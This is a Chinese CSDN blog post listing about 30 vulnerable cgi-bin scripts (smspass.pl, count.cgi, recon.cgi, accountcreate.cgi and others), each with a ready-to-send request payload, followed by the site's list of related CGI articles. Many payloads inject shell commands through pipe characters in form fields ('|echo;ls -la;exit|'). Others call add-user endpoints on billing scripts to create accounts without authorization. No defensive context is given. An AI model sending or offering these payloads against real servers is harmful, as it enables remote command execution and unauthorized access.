Cgi-bin 30个漏洞+使用方法

最新推荐文章于 2024-06-10 18:45:02 发布
最新推荐文章于 2024-06-10 18:45:02 发布
阅读量1.1w 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jihaichen/article/details/80193596
版权
==============================


/smspass.pl
username=username&password=password


/index.cgi
wei=ren&gen=command


/passmaster.cgi
Action=Add&Username=Username&Password=Password


/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|


/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|


/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password


/ccbill-local.asp
post_values=username:password


/count.cgi
pinfile=|echo;ls -la;exit|


/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|


/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>


/af.cgi
_browser_out=|echo;ls -la;exit;|


/modify.cgi
username=username&password=password&expire=30


/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|


/gx9passwd.cgi
cmd=ADD&user=username&pass=password


/probecontrol.cgi
command=enable&username=username&password=password


/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit


/htadd.pl
configfile=|echo; ls -alt; exit


/gx9passwd.cgi
cmd=ADD&user=username&pass=password


/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password


/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)


/globill_ut.cgi
do=add&username=username&password=password&wpassword=password


/usercontrol.cgi
command=enable&username=USER&password=PASS


/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password


/addusr.pl
user=USER&pass=PASS&confirm=PASS


/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|


/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit


/af.cgi
/env.cgi
ADD+;echo;pwd;exit


/count.cgi
pinfile=|echo;pwd;exit|


/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|


/add.cgi
username=username&password=password&expire=30


==============================
季海晨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
cgi-bin php,Python CGI编程
weixin_42502896的博客
03-10 1998
什么是CGICGI 目前由NCSA维护,NCSA定义CGI如下:CGI(Common Gateway Interface),通用网关接口,它是一段程序,运行在服务器上如:HTTP服务器,提供同客户端HTML页面的接口。网页浏览为了更好的了解CGI是如何工作的,我们可以从在网页上点击一个链接或URL的流程:1、使用你的浏览器访问URL并连接到HTTP web 服务器。2、Web服务器接收到请求信息后...
cgi-bin是什么
jackin2的专栏
04-21 6082
CGI-BIN是一种特殊的目录,在进行交互式的WWW访问(如填写在线表格)时,需要服务器上有相应的程序对访问者输入的信息进行处理,这些程序就是CGI程序。CGI程序不能放在任意的目录下,只能放在CGI-BIN目录下。有的虚拟主机系统只提供一个公用的CGI-BIN目录,放置一些常用的CGI程序供虚拟主机用户使用,这对用户不够方便,因为用户经常需要放置自己编制的CGI程序。我安装一个apache,ap
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞到利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
检测cgi-bin漏洞存在方法
热门推荐
xiaoshan812613234的专栏
12-25 2万+
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test", 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出: v
漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
网络安全从业者的学习笔记
06-10 1260
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
cgi-bin目录
11-21 6819
CGI-BIN是一种特殊的目录,在进行交互式的WWW访问(如填写在线表格)时,需要服务器上有 相应的程序对访问者输入的信息进行处理,这些程序就是CGI程序。       CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。   Common Gate Interfac
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
鲨鱼辣椒的博客
06-09 1988
CGI是什么? CGI(Common Gateway Interface)公共网关接口,是web服务器运行时外部程序的规范,几乎所有的服务器都支持CGI,也可以用r
腾讯旗下网站的很多URL都包含“cgi-bin”,是什么意思?他们后台用什么语言?...
weixin_34281537的博客
03-06 849
cgi-bin 这很有可能说明后台是C/C++写的. 动态Web技术刚出来的时候, 服务器调用本地应用程序处理http请求的技术. 通常是C/C++程序. 后来有了新的web开发技术后这类用的就比较少了. url后缀有个经验. php asp结尾的顾名思义可以知道是什么语言写的 .do .action .jsp 通常是java技术写的. 现...
Cgi-bin 30漏洞使用方法.txt
07-18
Cgi-bin 30漏洞使用方法
[cgi-bin] 30漏洞使用方法
weixin_33782386的博客
04-03 1760
/smspass.plusername=username&password=password/index.cgiwei=ren&gen=command/passmaster.cgiAction=Add&Username=Username&Password=Password/accountcreate.cgiusername=username&password...
C++编写第一个CGI程序
foreverzwl
09-15 4348
环境: wamp3.1.0 64bit VS2015 cmake 3.12.0 一、CGI简介 1、在进行交互式的WWW访问时,服务器上需要有相应的程序对输入的信息进行处理,这些程序就是CGI程序。 2、cgi-bin目录:用于存放CGI程序的特殊目录,CGI程序不能放在任意的目录下,只能放在CGI-BIN目录。 3、CGI程序可以用很多种语言编写,C、python、C++等等都可...
CGI安全漏洞资料速查 v1.0(一)
03-04
2. **w3-msql**:MiniSQL软件包中的CGI组件w3-msql存在一个低风险的安全漏洞,由于scanf()函数的不当使用,允许攻击者以httpd用户的权限执行任意代码。解决方案是删除或移动CGI-bin目录下的w3-msql文件,并应用提供...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
漏洞的成因在于路由器固件中包含了一个名为`execute cmd.cgi`的功能,这个功能允许经过身份验证的用户执行操作系统命令。然而,与之相关的是另一个不安全的身份验证漏洞(CVE-2020-24580),该漏洞使得攻击者无需...
cgi
juslly的博客
11-23 347
CGI(Common Gateway Interface) 是WWW技术中最重要的技术之一,有着不可替代的重要地位。CGI是外部应用程序(CGI程序)与WEB服务器之间的接口标准,是在CGI程序和Web服务器之间传递信息的过程。CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将Web的一组简单的静态超媒体文档变成一个完整的新的交互式媒体。 Common Gat
Web 编程
10000day
04-20 332
什么是 CGI ? 通用网关接口(Common Gateway Interface),简称 CGI,是一组定义如何将信息在 Web 服务器和一个自定义脚本之间交换的标准。 目前 CGI 的规范是由 NCSA 维护的;NCSA 定义 CGI 如下: 通用网关接口(CGI),是外部网关程序与信息服务器(例如,HTTP 服务器)之间的接口标准。 目前应用的版本是 CGI /1.1;CGI/1.2 版本正在开发中。 网页浏览 要了解 CGI 的概念,那我们先来看看,当我们点击超链接来浏览特定的网页或 URL 时会发
Burp Suite工具实现抓包分析cgi-bin漏洞教程
晓梦林的博客
03-02 2114
利用burp suite抓包工具实现分析cgi-bin漏洞
NFS服务器与CGI程序详解
weixin_48814356的博客
03-07 592
NFS服务器的两种挂载方法CGI程序的应用
Linux CGI----环境搭建(1)
weixin_38850997的博客
10-08 1085
1.安装 httpd yum -y install httpd 2.设置好CGI目录: vim /etc/httpd/conf/httpd.conf #设置字段ScriptAlias: ScriptAlias /cgi-bin/ /var/www/cgi-bin/ 3.默认情况下,Linux 服务器配置运行的 cgi-bin 目录中为 /var/www。 如果你想指定其他运行 CGI 脚本...
URL:/cgi-bin/key此url哪里包含命令执行
07-14
根据提供的URL路径 "/cgi-bin/key",无法确定是否包含命令执行。URL本身并不能直接指示命令执行的存在,因为命令执行通常是通过特定的参数或用户输入来触发的。 要确定是否存在命令执行漏洞,您需要进一步检查该URL所在的应用程序或服务器端点。以下是一些常见的迹象和指示可能存在命令执行漏洞的情况: 1. 用户输入:如果URL中包含用户输入的参数,例如通过查询字符串或POST请求传递的参数,那么这些参数可能会被滥用来执行恶意命令。 2. 未经验证的用户输入:如果应用程序未正确验证和过滤用户输入,并将其直接传递给系统命令或操作系统函数,那么可能存在命令执行漏洞。 3. 反斜杠和特殊字符:一些命令执行漏洞会利用特殊字符或反斜杠来绕过输入过滤和验证机制,从而执行恶意命令。因此,检查URL中是否存在这些字符可能会有所帮助。 请注意,这只是一种初步的检查方法,并不能确保绝对的安全性评估。为了确保应用程序和服务器的安全性,强烈建议进行全面的安全审计和测试,包括代码审查、漏洞扫描和渗透测试。此外,与安全专家合作,以获取更准确和详细的评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

季海晨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值